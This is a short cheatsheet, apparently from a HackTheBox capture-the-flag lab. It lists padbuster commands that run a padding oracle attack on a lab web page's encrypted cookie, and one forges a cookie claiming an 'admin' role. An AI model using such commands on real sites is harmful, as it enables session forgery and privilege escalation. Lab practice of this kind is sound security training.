Attack Cheatsheet

Attack Cheatsheet

Oracle Padding Attack

padbuster http://docker.hackthebox.eu:39547/profile.php SEvBsOSa55XO1%2FouXeqtEtWrgb05cphkJgi6QsTyY8%2F%2FeveSpSQoHFNFTCFP%2F4BcG2rDUTYAnOo%3D 8 --cookie "iknowmag1k=SEvBsOSa55XO1%2FouXeqtEtWrgb05cphkJgi6QsTyY8%2F%2FeveSpSQoHFNFTCFP%2F4BcG2rDUTYAnOo%3D;PHPSESSID=43cs7f94iqae3o0dp48l5seii3"
padbuster http://docker.hackthebox.eu:39547/profile.php SEvBsOSa55XO1%2FouXeqtEtWrgb05cphkJgi6QsTyY8%2F%2FeveSpSQoHFNFTCFP%2F4BcG2rDUTYAnOo%3D 8 --cookie "iknowmag1k=SEvBsOSa55XO1%2FouXeqtEtWrgb05cphkJgi6QsTyY8%2F%2FeveSpSQoHFNFTCFP%2F4BcG2rDUTYAnOo%3D;PHPSESSID=43cs7f94iqae3o0dp48l5seii3" -plaintext "{\"user\":\"XYZ@example.com\",\"role\":\"admin\"}"

Original: Updated: